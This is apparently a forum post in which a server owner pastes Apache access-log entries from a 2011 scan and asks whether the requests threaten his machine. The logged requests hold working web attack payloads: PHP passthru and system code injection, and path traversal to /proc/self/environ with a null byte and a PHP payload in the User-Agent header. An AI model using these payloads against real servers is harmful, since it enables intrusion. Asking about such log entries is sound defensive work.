Post by David Guntner
Still running my semi-crippled 2011 install - haven't had a chance to do
anything about that, yet.... :-)
That's all it says, so I'm not sure what the reset of the URL was.
Question is, is the above anything I need to worry about? Is there
going to be any information that they could get from the above that
might allow them to compromise my machine?

Post by David Guntner
mail.rostcom.net - - [11/Dec/2011:13:16:14 -0800] "GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 990 "-" "Mozilla/5.0 (Wind
ows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
mail.rostcom.net - - [11/Dec/2011:13:16:14 -0800] "GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1" 200 4186 "-" "<?php system(\"id\"); ?>"
mail.rostcom.net - - [11/Dec/2011:13:16:14 -0800] "GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1" 200 4186 "-" "<?php system(\"id\"); ?>"
mail.rostcom.net - - [11/Dec/2011:13:16:14 -0800] "GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1" 200 4186 "-" "<?php system(\"id\"); ?>"
mail.rostcom.net - - [11/Dec/2011:13:16:15 -0800] "GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 990 "-" "<?php system(\"id\"); ?>"
mail.rostcom.net - - [11/Dec/2011:13:16:15 -0800] "GET /site.php?a={%24{passthru%28chr%28105%29.chr%28100%29%29}} HTTP/1.1" 404 990 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"